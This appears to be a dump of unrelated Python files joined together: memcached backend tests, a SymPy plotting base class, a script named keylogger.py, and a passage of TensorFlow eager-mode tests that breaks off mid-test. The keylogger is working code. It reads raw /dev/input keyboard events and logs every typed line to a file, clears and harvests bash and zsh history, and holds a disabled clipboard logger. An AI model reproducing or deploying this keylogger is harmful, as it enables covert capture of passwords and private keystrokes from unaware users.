self.canary = []
self._cache = {}
MockClient.number_of_clients += 1
def get(self, key):
return self._cache.get(key)
def set(self, key, value, **kw):
self.canary.append(kw)
self._cache[key] = value
def delete(self, key):
self._cache.pop(key, None)
def __del__(self):
MockClient.number_of_clients -= 1
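# MockClient tracks live instances via number_of_clients so LocalThreadTest
# below can assert that each thread creates exactly one client and that
# clients are released once their thread-local storage is garbage collected.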
class PylibmcArgsTest(TestCase):
def test_binary_flag(self):
backend = MockPylibmcBackend(arguments={'url': 'foo','binary': True})
eq_(backend._create_client().kw["binary"], True)
def test_url_list(self):
backend = MockPylibmcBackend(arguments={'url': ["a", "b", "c"]})
eq_(backend._create_client().arg[0], ["a", "b", "c"])
def test_url_scalar(self):
backend = MockPylibmcBackend(arguments={'url': "foo"})
eq_(backend._create_client().arg[0], ["foo"])
def test_behaviors(self):
backend = MockPylibmcBackend(arguments={'url': "foo",
"behaviors": {"q": "p"}})
eq_(backend._create_client().kw["behaviors"], {"q": "p"})
def test_set_time(self):
backend = MockPylibmcBackend(arguments={'url': "foo",
"memcached_expire_time": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockPylibmcBackend(arguments={'url': "foo",
"min_compress_len": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
def test_no_set_args(self):
backend = MockPylibmcBackend(arguments={'url': "foo"})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{}])
class MemcachedArgsTest(TestCase):
def test_set_time(self):
backend = MockMemcacheBackend(arguments={'url': "foo",
"memcached_expire_time": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"time": 20}])
def test_set_min_compress_len(self):
backend = MockMemcacheBackend(arguments={'url': "foo",
"min_compress_len": 20})
backend.set("foo", "bar")
eq_(backend._clients.memcached.canary, [{"min_compress_len": 20}])
class LocalThreadTest(TestCase):
def setUp(self):
import gc
gc.collect()
eq_(MockClient.number_of_clients, 0)
def test_client_cleanup_1(self):
self._test_client_cleanup(1)
def test_client_cleanup_3(self):
self._test_client_cleanup(3)
def test_client_cleanup_10(self):
self._test_client_cleanup(10)
def _test_client_cleanup(self, count):
backend = MockGenericMemcachedBackend(arguments={'url': 'foo'})
canary = []
def f():
backend._clients.memcached
canary.append(MockClient.number_of_clients)
time.sleep(.05)
threads = [Thread(target=f) for i in range(count)]
for t in threads:
t.start()
for t in threads:
t.join()
eq_(canary, [i + 1 for i in range(count)])
if compat.py27:
eq_(MockClient.number_of_clients, 0)
else:
eq_(MockClient.number_of_clients, 1)
|
plot_mode_base.py
|
from __future__ import print_function, division
from pyglet.gl import *
from plot_mode import PlotMode
from threading import Thread, Event, RLock
from color_scheme import ColorScheme
from sympy.core import S
from sympy.core.compatibility import is_sequence
from time import sleep
import warnings
class PlotModeBase(PlotMode):
"""
Intended parent class for plotting
modes. Provides base functionality
in conjunction with its parent,
PlotMode.
"""
##
## Class-Level Attributes
##
"""
The following attributes are meant
to be set at the class level, and serve
as parameters to the plot mode registry
(in PlotMode). See plot_modes.py for
concrete examples.
"""
"""
i_vars
'x' for Cartesian2D
'xy' for Cartesian3D
etc.
d_vars
'y' for Cartesian2D
'r' for Polar
etc.
"""
i_vars, d_vars = '', ''
"""
intervals
Default intervals for each i_var, and in the
same order. Specified [min, max, steps].
No variable can be given (it is bound later).
"""
intervals = []
"""
aliases
A list of strings which can be used to
access this mode.
'cartesian' for Cartesian2D and Cartesian3D
'polar' for Polar
'cylindrical', 'polar' for Cylindrical
Note that _init_mode chooses the first alias
in the list as the mode's primary_alias, which
will be displayed to the end user in certain
contexts.
"""
aliases = []
"""
is_default
Whether to set this mode as the default
for arguments passed to PlotMode() containing
the same number of d_vars as this mode and
at most the same number of i_vars.
"""
is_default = False
"""
All of the above attributes are defined in PlotMode.
The following ones are specific to PlotModeBase.
"""
"""
A list of the render styles. Do not modify.
"""
styles = {'wireframe': 1, 'solid': 2, 'both': 3}
"""
style_override
Always use this style if not blank.
"""
style_override = ''
"""
default_wireframe_color
default_solid_color
Can be used when color is None or being calculated.
Used by PlotCurve and PlotSurface, but not anywhere
in PlotModeBase.
"""
default_wireframe_color = (0.85, 0.85, 0.85)
default_solid_color = (0.6, 0.6, 0.9)
default_rot_preset = 'xy'
##
## Instance-Level Attributes
##
## 'Abstract' member functions
def _get_evaluator(self):
if self.use_lambda_eval:
try:
e = self._get_lambda_evaluator()
return e
except Exception:
warnings.warn("\nWarning: creating lambda evaluator failed. "
"Falling back on sympy subs evaluator.")
return self._get_sympy_evaluator()
def _get_sympy_evaluator(self):
raise NotImplementedError()
def _get_lambda_evaluator(self):
raise NotImplementedError()
def _on_calculate_verts(self):
raise NotImplementedError()
def _on_calculate_cverts(self):
raise NotImplementedError()
## Base member functions
def __init__(self, *args, **kwargs):
self.verts = []
self.cverts = []
self.bounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self.cbounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self._draw_lock = RLock()
self._calculating_verts = Event()
self._calculating_cverts = Event()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = 0.0
self._calculating_cverts_pos = 0.0
self._calculating_cverts_len = 0.0
self._max_render_stack_size = 3
self._draw_wireframe = [-1]
self._draw_solid = [-1]
self._style = None
self._color = None
self.predraw = []
self.postdraw = []
self.use_lambda_eval = self.options.pop('use_sympy_eval', None) is None
self.style = self.options.pop('style', '')
self.color = self.options.pop('color', 'rainbow')
self.bounds_callback = kwargs.pop('bounds_callback', None)
self._on_calculate()
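# `synchronized` is a decorator: the wrapped method runs with self._draw_lock
# (a reentrant lock) held, so methods that mutate the render state (draw,
# push_wireframe, push_solid, the style/color setters) serialize against the
# background calculation threads.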
def synchronized(f):
def w(self, *args, **kwargs):
self._draw_lock.acquire()
try:
r = f(self, *args, **kwargs)
return r
finally:
self._draw_lock.release()
return w
@synchronized
def push_wireframe(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_wireframe.append(function)
if len(self._draw_wireframe) > self._max_render_stack_size:
del self._draw_wireframe[1] # leave marker element
@synchronized
def push_solid(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_solid.append(function)
if len(self._draw_solid) > self._max_render_stack_size:
del self._draw_solid[1] # leave marker element
def _create_display_list(self, function):
dl = glGenLists(1)
glNewList(dl, GL_COMPILE)
function()
glEndList()
return dl
def _render_stack_top(self, render_stack):
top = render_stack[-1]
if top == -1:
return -1 # nothing to display
elif callable(top):
dl = self._create_display_list(top)
render_stack[-1] = (dl, top)
return dl # display newly added list
elif len(top) == 2:
if GL_TRUE == glIsList(top[0]):
return top[0] # display stored list
dl = self._create_display_list(top[1])
render_stack[-1] = (dl, top[1])
return dl # display regenerated list
def _draw_solid_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glCallList(dl)
glPopAttrib()
def _draw_wireframe_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glEnable(GL_POLYGON_OFFSET_LINE)
glPolygonOffset(-0.005, -50.0)
glCallList(dl)
glPopAttrib()
@synchronized
def draw(self):
for f in self.predraw:
if callable(f):
f()
if self.style_override:
style = self.styles[self.style_override]
else:
style = self.styles[self._style]
# Draw solid component if style includes solid
if style & 2:
dl = self._render_stack_top(self._draw_solid)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_solid_display_list(dl)
# Draw wireframe component if style includes wireframe
if style & 1:
dl = self._render_stack_top(self._draw_wireframe)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_wireframe_display_list(dl)
for f in self.postdraw:
if callable(f):
f()
def _on_change_color(self, color):
Thread(target=self._calculate_cverts).start()
def _on_calculate(self):
Thread(target=self._calculate_all).start()
def _calculate_all(self):
self._calculate_verts()
self._calculate_cverts()
def _calculate_verts(self):
if self._calculating_verts.is_set():
return
self._calculating_verts.set()
try:
self._on_calculate_verts()
finally:
self._calculating_verts.clear()
if callable(self.bounds_callback):
self.bounds_callback()
def _calculate_cverts(self):
if self._calculating_verts.is_set():
return
while self._calculating_cverts.is_set():
sleep(0) # wait for previous calculation
self._calculating_cverts.set()
try:
self._on_calculate_cverts()
finally:
self._calculating_cverts.clear()
def _get_calculating_verts(self):
return self._calculating_verts.is_set()
def _get_calculating_verts_pos(self):
return self._calculating_verts_pos
def _get_calculating_verts_len(self):
return self._calculating_verts_len
def _get_calculating_cverts(self):
return self._calculating_cverts.is_set()
def _get_calculating_cverts_pos(self):
return self._calculating_cverts_pos
def _get_calculating_cverts_len(self):
return self._calculating_cverts_len
## Property handlers
def _get_style(self):
return self._style
@synchronized
def _set_style(self, v):
if v is None:
return
if v == '':
step_max = 0
for i in self.intervals:
if i.v_steps is None:
continue
step_max = max([step_max, int(i.v_steps)])
v = ['both', 'solid'][step_max > 40]
if v not in self.styles:
raise ValueError("v should be there in self.styles")
if v == self._style:
return
self._style = v
def _get_color(self):
return self._color
@synchronized
def _set_color(self, v):
try:
if v is not None:
if is_sequence(v):
v = ColorScheme(*v)
else:
v = ColorScheme(v)
if repr(v) == repr(self._color):
return
self._on_change_color(v)
self._color = v
except Exception as e:
raise RuntimeError(("Color change failed. "
"Reason: %s" % (str(e))))
style = property(_get_style, _set_style)
color = property(_get_color, _set_color)
calculating_verts = property(_get_calculating_verts)
calculating_verts_pos = property(_get_calculating_verts_pos)
calculating_verts_len = property(_get_calculating_verts_len)
calculating_cverts = property(_get_calculating_cverts)
calculating_cverts_pos = property(_get_calculating_cverts_pos)
calculating_cverts_len = property(_get_calculating_cverts_len)
## String representations
def __str__(self):
f = ", ".join(str(d) for d in self.d_vars)
o = "'mode=%s'" % (self.primary_alias)
return ", ".join([f, o])
def __repr__(self):
f = ", ".join(str(d) for d in self.d_vars)
i = ", ".join(str(i) for i in self.intervals)
d = [('mode', self.primary_alias),
('color', str(self.color)),
('style', str(self.style))]
o = "'%s'" % (("; ".join("%s=%s" % (k, v)
for k, v in d if v != 'None')))
return ", ".join([f, i, o])
|
keylogger.py
|
# import needed modules
import os
import getpass
from datetime import datetime
#import pyxhook
import traceback
import threading
import argparse
import time
#import clipboard
import logging
import re
import struct
from shutil import copyfile
userIn = [] # string buffer before storing in file (during RETURN)
currIndex = 0 # cursor index (for insert, backspace, delete, etc)
logsFolder = None
bashPath = ""
zshPath = ""
#new_hook = None
def setArgs():
global logsFolder
parser = argparse.ArgumentParser()
parser.add_argument("--logsFolder", help="path where logs are stored (default=/tmp/USAGE_LOGS)", action="store")
args = parser.parse_args()
if isinstance(args.logsFolder, str):
logsFolder = args.logsFolder
if not logsFolder[-1:] == "/":
logsFolder += "/"
else:
logsFolder = "/tmp/USAGE_LOGS/"
print(f"Logs will be stored in {logsFolder}")
def backupAndClear(path):
try:
copyfile(path, f"{path}_bak")
open(path, 'w').close()
print(f"backed up file @ {path}")
except Exception:
print(traceback.format_exc())
print(f"unable to backup and clear {path}")
"""
# CLIPBOARD LOGGING FUNCTIONS
def logClipboard():
global logsFolder
clipboardLogPath = logsFolder+"clipboard.log"
oldContent = ""
newContent = ""
while True:
newContent = clipboard.paste()
if not (newContent == None or newContent == "") and (not newContent == oldContent):
t = time.strftime("%H:%M:%S", time.localtime())
with open(clipboardLogPath, 'a') as f:
if not newContent[-1:] == '\n':
f.write(f"ENTRY @ {t}\n{newContent}\n")
else:
f.write(f"ENTRY @ {t}\n{newContent}")
oldContent = newContent
logging.debug(f"Written to clipboard log @ {t}")
time.sleep(1)
def runClipboardLogging():
print("Starting ClipboardLogger Thread...")
cbThread = threading.Thread(target=logClipboard, name='clipboardLogger', daemon=True)
cbThread.start()
"""
# BASH HISTORY LOGGING FUNCTIONS
def findFile(fname, base):
#logging.debug("Find FIle entered")
paths = None
for root,dirs,files in os.walk(base):
#logging.debug(f"{root} {dirs} {files}")
# only look in /root or /home
if fname in files:
paths = os.path.join(root, fname)
#logging.debug(f"{paths}")
return paths
def appendShellLogs(histPath, logsPath):
#logging.debug("appendShellLogs")
pos = 0
# check for file exists
if not os.path.exists(logsPath):
open(logsPath, 'a').close()
# get latest 5 lines from logs
with open(logsPath, 'r') as f:
logs = f.readlines()
#print("logs readline")
#print(logs)
if logs and not logs == []:
latest = logs[-3:]
#print("latest 3")
#print(latest)
with open(histPath, 'r') as g:
hist = g.readlines()
#print("history readline")
#print(hist)
if hist and not hist == []:
#for i in range(0, len(hist)):
#print("I: {0} | CONT: {1}".format(i, hist[i]))
hasMatch = False
for pos in range(0, len(hist)):
#print("pos = " + str(pos))
#print("{0} @ POS {1}".format(hist[pos], pos))
if hist[pos] == latest[0]:
# possible match, checking next 2 entries
#print("match found @ " + str(pos))
try:
if hist[pos+1] == latest[1] and hist[pos+2] == latest[2]:
# copy lines pos -> len(hist) into logs
hist = hist[pos+3:]
if not hist == []:
with open(logsPath, 'a') as f:
f.writelines(hist)
hasMatch = True
break
except IndexError:
#print("END OF FILE, NO MATCHES")
break
if not hasMatch:
with open(logsPath, 'a') as f:
f.writelines(hist)
else:
with open(histPath, 'r') as g:
with open(logsPath, 'a') as f:
f.writelines(g.readlines())
#print("history saved")
def logShellHistory(runOnce=False):
global logsFolder, bashPath, zshPath
#logging.basicConfig(level=logging.DEBUG, format='%(threadName)s %(message)s')
#logging.debug("Run logShellHistory")
bashLogsPath = logsFolder+"bash.log"
zshLogsPath = logsFolder+"zsh.log"
#logging.debug("OUT: {0} {1} {2} {3} {4}".format(user, bashPath, zshPath, bashLogsPath, zshLogsPath))
if not runOnce:
while True:
#logging.debug("While True entered....")
if bashPath and not bashPath == "":
appendShellLogs(bashPath, bashLogsPath)
t = time.strftime("%H:%M:%S", time.localtime())
logging.debug(f"Ran appendShellLogs @ {t}")
else:
print("bash history not available, skipping")
if zshPath and not zshPath == "":
appendShellLogs(zshPath, zshLogsPath)
t = time.strftime("%H:%M:%S", time.localtime())
logging.debug(f"Ran appendShellLogs @ {t}")
else:
print("zsh history not available, skipping")
time.sleep(5*60) # do every 5mins
else:
t = time.strftime("%H:%M:%S", time.localtime())
logging.debug(f"Ran appendShellLogs @ {t}")
if bashPath and not bashPath == "":
appendShellLogs(bashPath, bashLogsPath)
if zshPath and not zshPath == "":
appendShellLogs(zshPath, zshLogsPath)
#logging.debug("leave logShellHistory")
def runShellLogging():
#print("Starting Shell Logger Thread...")
# start bashlogger
blThread = threading.Thread(target=logShellHistory, name='shellLogger', daemon=True)
blThread.start()
#print("Started LOGGER")
qwerty_map = {
2: "1", 3: "2", 4: "3", 5: "4", 6: "5", 7: "6", 8: "7", 9: "8", 10: "9", 11: "0", 12: "-", 13: "=", 14: "[BACKSPACE]",
15: "[TAB]", 16: "q", 17: "w", 18: "e", 19: "r", 20: "t", 21: "y", 22: "u", 23: "i", 24: "o", 25: "p", 26: "[", 27: "]",
28: "[ENTER]", 29: "[CTRL]", 97: "[CTRL]", 100: "[ALT]",
30: "a", 31: "s", 32: "d", 33: "f", 34: "g", 35: "h", 36: "j", 37: "k", 38: "l", 39: ";", 40: "'", 41: "`", 42: "[SHIFT]", 43: "\\",
44: "z", 45: "x", 46: "c", 47: "v", 48: "b", 49: "n", 50: "m", 51: ",", 52: ".", 53: "/", 54: "[SHIFT]", 55: "[FN]", 56: "[ALT]", 57: " ", 58: "[CAPS_LOCK]",
105: "LEFT", 106: "RIGHT", 103: "UP", 108: "DOWN", 111: "DEL", 107: "END", 102: "HOME", 69: "NUM_LOCK", 104: "PAGE_UP", 109: "PAGE_DOWN",
82: "0", 83: ".", 79: "1", 80: "2", 81: "3", 75: "4", 76: "5", 77: "6", 71: "7", 72: "8", 73: "9", 98: "/", 55: "*", 74: "-", 78: "+", 96: "[ENTER]"
}
shifted_qwerty_map = {
2: "!", 3: "@", 4: "#", 5: "$", 6: "%", 7: "^", 8: "&", 9: "*", 10: "(", 11: ")", 12: "_", 13: "+", 14: "[BACKSPACE]",
15: "[TAB]", 16: "Q", 17: "W", 18: "E", 19: "R", 20: "T", 21: "Y", 22: "U", 23: "I", 24: "O", 25: "P", 26: "{", 27: "}",
28: "[ENTER]", 29: "[CTRL]", 97: "[CTRL]", 100: "[ALT]",
30: "A", 31: "S", 32: "D", 33: "F", 34: "G", 35: "H", 36: "J", 37: "K", 38: "L", 39: ":", 40: "\"", 41: "~", 42: "[SHIFT]", 43: "|",
44: "Z", 45: "X", 46: "C", 47: "V", 48: "B", 49: "N", 50: "M", 51: "<", 52: ">", 53: "?", 54: "[SHIFT]", 55: "[FN]", 56: "[ALT]", 57: " ", 58: "[CAPS_LOCK]",
105: "LEFT", 106: "RIGHT", 103: "[UP]", 108: "[DOWN]", 111: "DEL", 107: "END", 102: "HOME", 69: "NUM_LOCK", 104: "PAGE_UP", 109: "PAGE_DOWN",
82: "0", 83: ".", 79: "1", 80: "2", 81: "3", 75: "4", 76: "5", 77: "6", 71: "7", 72: "8", 73: "9", 98: "/", 55: "*", 74: "-", 78: "+", 96: "[ENTER]"
}
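# NOTE: the integer keys above appear to follow Linux evdev scan codes for a
# US QWERTY layout (see /usr/include/linux/input-event-codes.h); keypad keys
# (codes 71-83, 96, 98) are mapped to the characters they produce rather than
# to tagged tokens.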
# KEYBOARD INPUT LOGGING FUNCTIONS
def runKeyLogging():
global logsFolder
# specify the name of the log file (can be changed)
log_file = logsFolder+'keylogger.log'
# the logging function with {event parm}
def OnKeyPress(ch):
global userIn, currIndex
if ch == "[ENTER]":
#print('ENTERED')
if not userIn == []:
with open(log_file, "a") as f: # open a file as f with Append (a) mode
f.write(f"{''.join(userIn)}\n")
userIn = [] # clear userIn
currIndex = 0
else:
if 'LEFT' in ch: # if Left pressed and not at start of string
if not currIndex <= 0:
currIndex -= 1
#print("str len = {0} | index = {1}".format(len(userIn), currIndex))
elif 'RIGHT' in ch: # if Right pressed and not at end of string
if not currIndex >= len(userIn):
currIndex += 1
#print("str len = {0} | index = {1}".format(len(userIn), currIndex))
elif 'BACKSPACE' in ch:
if currIndex == 0:
pass # backspace does nothing at position 0
else:
userIn = userIn[:currIndex-1] + userIn[currIndex:]
currIndex -=1
#print("USERIN: " + "".join(userIn))
elif 'DEL' in ch:
userIn = userIn[:currIndex] + userIn[currIndex+1:] # remove single character
#print("USERIN: " + "".join(userIn))
elif 'END' in ch:
currIndex = len(userIn) # move to end of string
elif 'HOME' in ch:
currIndex = 0
elif any(x in ch for x in ['CTRL', 'ALT', 'NUM_LOCK', 'PAGE_', 'SHIFT', 'UP', 'DOWN']): #, 'CAPS_LOCK', 'SHIFT']):
pass # prevent weird characters from being entered
else:
userIn.insert(currIndex, ch)
print("USERIN: " + "".join(userIn))
currIndex += 1
#print("str len = {0} | index = {1}".format(len(userIn), currIndex))
with open("/proc/bus/input/devices") as f:
lines = f.readlines()
pattern = re.compile("Handlers|EV=")
handlers = list(filter(pattern.search, lines))
pattern = re.compile("EV=120013")
for idx, elt in enumerate(handlers):
if pattern.search(elt):
line = handlers[idx - 1]
pattern = re.compile("event[0-9]")
infile_path = "/dev/input/" + pattern.search(line).group(0)
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
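# 'llHHI' mirrors struct input_event on 64-bit Linux: two longs for the
# timeval (seconds, microseconds), two unsigned shorts for the event type
# and key code, and an unsigned int for the value (0 = release, 1 = press,
# 2 = autorepeat).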
in_file = open(infile_path, "rb")
event = in_file.read(EVENT_SIZE)
typed = ""
shifted = False
while event:
(_, _, type, code, value) = struct.unpack(FORMAT, event)
if code == 54 or code == 42:
if value == 0:
shifted = False
else:
shifted = True
if code != 0 and type == 1 and value == 1:
print(f"[{code}]")
if code in qwerty_map:
if shifted:
OnKeyPress(shifted_qwerty_map[code])
else:
OnKeyPress(qwerty_map[code])
try:
event = in_file.read(EVENT_SIZE)
except KeyboardInterrupt:
print("\nBefore stopping keylogger, ensure all shell tabs/windows \n\
have been closed (excluding this tab), before stopping keylogger.py \n\
This ensures that shell history is updated!\n")
opt = input("Stop keylogger? [y/n]: ")
# anything other than an explicit 'y' ignores the exit request
if opt == 'y':
logShellHistory(runOnce=True)
in_file.close()
break
except Exception:
print(traceback.format_exc())
break
if __name__ == "__main__":
print("To work properly, ensure this program is started by the primary user and console window.")
input("Press enter to continue")
print("Backup of .bash_history and .zsh_history will be made, and history files will be cleared.\nBacked up logs are stored in user home directory.")
input("Press enter to acknowledge")
# run backing up of history file, and clear history file
while True:
isRootUser = input("Is the current user root? [Y / N]")
if isRootUser.lower() == 'y':
base = '/root'
break
elif isRootUser.lower() == 'n':
currUser = input("Enter current username:")
if not currUser == '' and os.path.exists(f'/home/{currUser}'):
base = f'/home/{currUser}'
break
else:
print('Invalid username!\n')
else:
print("Not a valid input!\n")
#logging.debug(f"{user}")
bashPath = findFile(".bash_history", base) # for the older kali using bash
#logging.debug("2")
zshPath = findFile(".zsh_history", base) # for the newer kali using zsh
startShellLogging = True
if bashPath and os.path.exists(bashPath):
backupAndClear(bashPath)
print("Backed up .bash_history")
if zshPath and os.path.exists(zshPath):
backupAndClear(zshPath)
print("Backed up .zsh_history")
if not zshPath and not bashPath:
print("Unable to detect any shell logs available, shell logging will be ignored.")
startShellLogging = False
print("Starting...")
setArgs()
if not os.path.exists(logsFolder):
# create the logs folder
os.makedirs(logsFolder)
logging.basicConfig(level=logging.DEBUG, format='%(threadName)s %(message)s')
#logging.debug("some text")
#runClipboardLogging()
if startShellLogging:
runShellLogging()
runKeyLogging()
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
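# configure_virtual_cpus splits the single physical CPU into two logical
# devices so the placement tests below (e.g. testMultiCpuPlacement) can
# target both '/device:CPU:0' and '/device:CPU:1'.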
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.abc.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning: even though element-wise comparison should make these ambiguous,
# list equality short-circuits on identity, so both TF and numpy accept
# lists containing the same objects without raising an error.
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similarly, an `in` check such as `if a in [a, b]` should be ambiguous;
# it works when `a` is the first element because the identity comparison
# short-circuits before element-wise equality is evaluated.
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
